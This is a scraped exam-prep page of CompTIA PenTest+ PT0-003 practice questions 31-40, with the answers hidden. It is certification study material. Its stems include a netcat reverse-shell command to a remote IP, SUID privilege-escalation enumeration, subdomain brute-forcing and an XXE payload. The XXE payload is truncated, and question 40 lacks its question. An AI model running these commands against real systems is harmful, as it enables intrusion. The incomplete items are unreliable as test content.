Big Halloween Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: simple70

Pass the CompTIA PenTest+ PT0-003 Questions and answers with CertsForce

Viewing page 4 out of 8 pages
Viewing questions 31-40 out of questions
Questions # 31:

A penetration tester executes multiple enumeration commands to find a path to escalate privileges. Given the following command:

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Which of the following is the penetration tester attempting to enumerate?

Options:

A.

Attack path mapping


B.

API keys


C.

Passwords


D.

Permission


Expert Solution
Questions # 32:

A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com. Which of the following is the best command for the tester to use?

Options:

A.

nslookup mydomain.com » /path/to/results.txt


B.

crunch 1 2 | xargs -n 1 -I 'X' nslookup X.mydomain.com


C.

dig @8.8.8.8 mydomain.com ANY » /path/to/results.txt


D.

cat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com


Expert Solution
Questions # 33:

A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent:

xml

Copy code

<!DOCTYPE data [

]>

&foo;

Which of the following should the tester recommend in the report to best prevent this type of vulnerability?

Options:

A.

Drop all excessive file permissions with chmod o-rwx.


B.

Ensure the requests application access logs are reviewed frequently.


C.

Disable the use of external entities.


D.

Implement a WAF to filter all incoming requests.


Expert Solution
Questions # 34:

A penetration tester is working on an engagement in which a main objective is to collect confidential information that could be used to exfiltrate data and perform a ransomware attack. During the engagement, the tester is able to obtain an internal foothold on the target network. Which of the following is the next task the tester should complete to accomplish the objective?

Options:

A.

Initiate a social engineering campaign.


B.

Perform credential dumping.


C.

Compromise an endpoint.


D.

Share enumeration.


Expert Solution
Questions # 35:

A penetration tester gains access to a domain server and wants to enumerate the systems within the domain. Which of the following tools would provide the best oversight of domains?

Options:

A.

Netcat


B.

Wireshark


C.

Nmap


D.

Responder


Expert Solution
Questions # 36:

While conducting an assessment, a penetration tester identifies the details for several unreleased products announced at a company-wide meeting. Which of the following attacks did the tester most likely use to discover this information?

Options:

A.

Eavesdropping


B.

Bluesnarfing


C.

Credential harvesting


D.

SQL injection attack


Expert Solution
Questions # 37:

A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:

nc -e /bin/sh 10.10.10.16 4444

Which of the following would most likely bypass the filtered space character?

Options:

A.

${IFS}


B.

%0a


C.

+ *


D.

%20


Expert Solution
Questions # 38:

While performing reconnaissance, a penetration tester attempts to identify publicly accessible ICS (Industrial Control Systems) and IoT (Internet of Things) systems. Which of the following tools is most effective for this task?

Options:

A.

theHarvester


B.

Shodan


C.

Amass


D.

Nmap


Expert Solution
Questions # 39:

Which of the following describes the process of determining why a vulnerability scanner is not providing results?

Options:

A.

Root cause analysis


B.

Secure distribution


C.

Peer review


D.

Goal reprioritization


Expert Solution
Questions # 40:
Options:

A.

A generative AI assistant


B.

The customer's designated contact


C.

A cybersecurity industry peer


D.

A team member


Expert Solution
Viewing page 4 out of 8 pages
Viewing questions 31-40 out of questions